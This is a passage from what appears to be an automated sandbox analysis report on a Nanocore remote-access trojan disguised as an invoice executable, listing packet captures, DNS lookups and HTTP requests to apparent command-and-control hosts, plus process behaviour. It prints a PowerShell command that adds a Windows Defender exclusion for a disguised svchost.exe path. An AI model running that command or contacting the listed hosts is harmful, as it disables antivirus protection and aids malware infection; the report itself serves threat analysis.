                                                                                                              Feb 25, 2021 15:10:41.546930075 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.546943903 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.546945095 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.546957970 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.546974897 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.546983004 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.546992064 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.547008991 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.547018051 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.547020912 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.547034025 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.547045946 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.547060013 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.547094107 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.557971001 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558043003 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558082104 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558103085 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558123112 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558146000 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558146000 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558170080 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558192968 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558201075 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558214903 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558237076 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558252096 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558259964 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558275938 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558290958 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558295012 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558307886 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558322906 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558322906 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558341026 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558362007 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558387041 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558422089 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558456898 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558474064 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558489084 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558505058 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558506012 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558523893 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558532000 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558568001 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558676004 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558717966 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558748960 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558762074 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558782101 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558820009 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558830976 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558851004 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558876991 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558892965 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558903933 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558907986 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558921099 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558932066 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558933020 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558947086 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558960915 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558974028 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558975935 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558985949 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559010029 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559111118 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559169054 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559634924 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559688091 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559725046 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559741974 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559766054 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559797049 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559818029 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559830904 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559849024 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559865952 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559880972 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559887886 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559896946 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559916019 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559937954 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559957981 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559969902 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559973955 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559993982 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560013056 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560029984 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.560082912 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.560683012 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560728073 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560774088 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560791016 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560801029 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.560820103 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560837030 CET4973180192.168.2.4172.67.172.17

                                                                                                              UDP Packets


                                                                                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 25, 2021 15:09:58.368985891 CET | 192.168.2.4 | 8.8.8.8 | 0x395a | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:09:59.361884117 CET | 192.168.2.4 | 8.8.8.8 | 0x395a | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:28.233695984 CET | 192.168.2.4 | 8.8.8.8 | 0x20c9 | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:40.718133926 CET | 192.168.2.4 | 8.8.8.8 | 0xc8c | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:11:36.266458988 CET | 192.168.2.4 | 8.8.8.8 | 0x582e | Standard query (0) | nanopc.linkpc.net | A (IP address) | IN (0x0001)
Feb 25, 2021 15:11:55.282066107 CET | 192.168.2.4 | 8.8.8.8 | 0xc439 | Standard query (0) | nanopc.linkpc.net | A (IP address) | IN (0x0001)
Feb 25, 2021 15:12:14.123791933 CET | 192.168.2.4 | 8.8.8.8 | 0x36af | Standard query (0) | nanopc.linkpc.net | A (IP address) | IN (0x0001)

                                                                                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 25, 2021 15:09:59.421478033 CET | 8.8.8.8 | 192.168.2.4 | 0x395a | No error (0) | coroloboxorozor.com | | 172.67.172.17 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:09:59.421478033 CET | 8.8.8.8 | 192.168.2.4 | 0x395a | No error (0) | coroloboxorozor.com | | 104.21.71.230 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:28.292831898 CET | 8.8.8.8 | 192.168.2.4 | 0x20c9 | No error (0) | coroloboxorozor.com | | 172.67.172.17 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:28.292831898 CET | 8.8.8.8 | 192.168.2.4 | 0x20c9 | No error (0) | coroloboxorozor.com | | 104.21.71.230 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:40.775327921 CET | 8.8.8.8 | 192.168.2.4 | 0xc8c | No error (0) | coroloboxorozor.com | | 172.67.172.17 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:40.775327921 CET | 8.8.8.8 | 192.168.2.4 | 0xc8c | No error (0) | coroloboxorozor.com | | 104.21.71.230 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:11:36.427895069 CET | 8.8.8.8 | 192.168.2.4 | 0x582e | No error (0) | nanopc.linkpc.net | | 157.97.120.21 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:11:55.443322897 CET | 8.8.8.8 | 192.168.2.4 | 0xc439 | No error (0) | nanopc.linkpc.net | | 157.97.120.21 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:12:14.186263084 CET | 8.8.8.8 | 192.168.2.4 | 0x36af | No error (0) | nanopc.linkpc.net | | 157.97.120.21 | A (IP address) | IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • coroloboxorozor.com

                                                                                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49722 | 172.67.172.17 | 80 | C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe

Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:09:59.512818098 CET | 3777 | OUT | GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
                                                                                                              Connection: Keep-Alive
Feb 25, 2021 15:09:59.651695013 CET | 3779 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:09:59 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d874c778fd4511dc72e62286c184f05a41614262199; expires=Sat, 27-Mar-21 14:09:59 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              last-modified: Wed, 24 Feb 2021 19:31:15 GMT
                                                                                                              vary: Accept-Encoding
                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b1f7cfe0000c867daaee000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=j8IazhNMg77%2FDC1bDYDx8mGOoLFx0A8MoiG9INqFFjh926qrcn%2BnWB8Q3%2FSEGU%2FK4Rfw%2BkKDTgIPRwyGW2PVX7TmFpJdyQtqgFYQGPJxy66DwMnH"}],"max_age":604800}
                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627201db2e1fc867-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Feb 25, 2021 15:10:00.051585913 CET | 4841 | OUT | GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
Feb 25, 2021 15:10:00.181399107 CET | 4842 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:00 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d2878a0d6029ba23ea7ff699e275fcdd01614262200; expires=Sat, 27-Mar-21 14:10:00 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:18 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b1f7f170000c86706390000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=nH%2FcEGrKbhT%2BSE0IaOang1ZWsHreTkZayeW9jdPdQTOMDOCpfCJLnQ5pbIolDidnnEmbnQCJHPNrer49bCPjKc5PXpgkpb0ZOZts1QmoBonXRtbq"}],"max_age":604800}
                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627201de8ba5c867-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Feb 25, 2021 15:10:00.454377890 CET | 5904 | OUT | GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
Feb 25, 2021 15:10:00.596854925 CET | 5906 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:00 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d2878a0d6029ba23ea7ff699e275fcdd01614262200; expires=Sat, 27-Mar-21 14:10:00 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:20 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b1f80ab0000c867fda5c000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=pSys8V33zYUGeef8OpVOg3DRwjwcsJn66s1cYn5SYI6fdDzD1zEKwHvzt6SOqA2kg1TH1zCSP2SNlsoi%2FxqyegbJfPRj50iepNQaDWv7EtG1DCq1"}],"max_age":604800}
                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627201e11fd8c867-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49728 | 172.67.172.17 | 80 | C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe

Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:10:28.487386942 CET | 5976 | OUT | GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
                                                                                                              Connection: Keep-Alive
Feb 25, 2021 15:10:28.581510067 CET | 5982 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:28 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=ddc4cb048fa245a5afafeb32bd14c9e1c1614262228; expires=Sat, 27-Mar-21 14:10:28 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:15 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b1fee2f0000203f9383c000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=7MKTBMU4YfWYCaOt8P7saLZdxjONpJmh1hloFvSdLTNaoS9xVbWVJAdMa02ylGpidZHWyBYy%2FAZKoAlbPgVIL3zy27zDh0FJ9rXnmKGM1YWB%2FQTg"}],"max_age":604800}
                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627202904d47203f-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Feb 25, 2021 15:10:29.119402885 CET  7049  OUT  GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
                                                                                                              Feb 25, 2021 15:10:29.206423044 CET  7051  IN  HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:29 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d2e96d585ba32558ef1a56ad0279a3a941614262229; expires=Sat, 27-Mar-21 14:10:29 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:18 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b1ff0a30000203f9326a000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mGcf6%2FLwbnC77V8a5IbltRI1hOsP6JHBGZtvG%2BZCsRThBu0FOqcFALKKkYCJ2tG7TwDSBo0t2QZQOsyNZ5a0CLMJwGcNMFWA0REKiaM8ya4hWEnV"}],"max_age":604800}
                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627202943f27203f-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Feb 25, 2021 15:10:41.261621952 CET  8594  OUT  GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
                                                                                                              Feb 25, 2021 15:10:41.343542099 CET  9183  IN  HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:41 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=df968e9bc436d32b19e2bf562890136031614262241; expires=Sat, 27-Mar-21 14:10:41 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              last-modified: Wed, 24 Feb 2021 19:31:20 GMT
                                                                                                              vary: Accept-Encoding
                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b2020110000203fa7aec000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=nINWiXu%2BwXd%2Fbx8d2B9lkv6YSUK9dbz5%2FTyDXZtbIKdI6DIgAakgloFv8oHWvAujXs5Ndt2aT%2FyFA%2BK2Tb3C4tPPqQT7cNaozpOCsU2u6mOnBP51"}],"max_age":604800}
                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627202e01fa7203f-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400


                                                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                                                              2  192.168.2.4  49731  172.67.172.17  80  C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              Timestamp  kBytes transferred  Direction  Data
                                                                                                              Feb 25, 2021 15:10:40.880906105 CET  8125  OUT  GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Feb 25, 2021 15:10:40.968910933 CET  8126  IN  HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:40 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d1debf37db94f80ca7bce3e750e3ab5571614262240; expires=Sat, 27-Mar-21 14:10:40 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:15 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b201e9600000b47bc8f1000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MwPbrpXDhEBhwbK7Fy9d%2B9tYP8e8hX0onlKmyOV4AaZpLWks95hE%2BbF96ssBOoRRFCvsUJJic6%2BG%2BPKcKiHp7NmuDMEMYXW0eN2Tb7926Cvi5IGq"}],"max_age":604800}
                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627202ddbe020b47-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Feb 25, 2021 15:10:41.431864023 CET  9210  OUT  GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
Feb 25, 2021 15:10:41.502985001 CET  9211  IN  HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:41 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d8daac7e5cc4bd1a2c1eb452b4bd80fc71614262241; expires=Sat, 27-Mar-21 14:10:41 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:18 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b2020bd00000b47eea8e000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xzufLKqwaALRfH8o918HoyhzuWlwbR3XuNNztF73J4jbX6yNSkfid29l7DPGsxGmMgCu7yk7vzUc8AdY%2BP1pOu%2BN9Y0pz%2FEieQrVdxEDxhobteZc"}],"max_age":604800}
                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627202e12c6d0b47-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Feb 25, 2021 15:10:53.715553045 CET  10317  OUT  GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
Feb 25, 2021 15:10:53.783530951 CET  10318  IN  HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:53 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d4de44723b8acb5b852a68d7a1c6b68e81614262253; expires=Sat, 27-Mar-21 14:10:53 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:20 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b2050b700000b47aeb3d000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RRpam08yb21ui9neTxb3iQ33jNbBtw8bAbyWjMcY4Lal4h4WZ5WnAzJt1lTGKu1juY69r0PXKBEB7JPYhumOSVGv3wffU6HNIo1lVmcrfHF92vAN"}],"max_age":604800}
                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 6272032dff3e0b47-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Memory Usage

                                                                                                              High Level Behavior Distribution

                                                                                                              Behavior

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Start time:15:09:56
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe'
                                                                                                              Imagebase:0xbf0000
                                                                                                              File size:38008 bytes
                                                                                                              MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Start time:15:10:08
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
                                                                                                              Imagebase:0xae0000
                                                                                                              File size:430592 bytes
                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:08
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
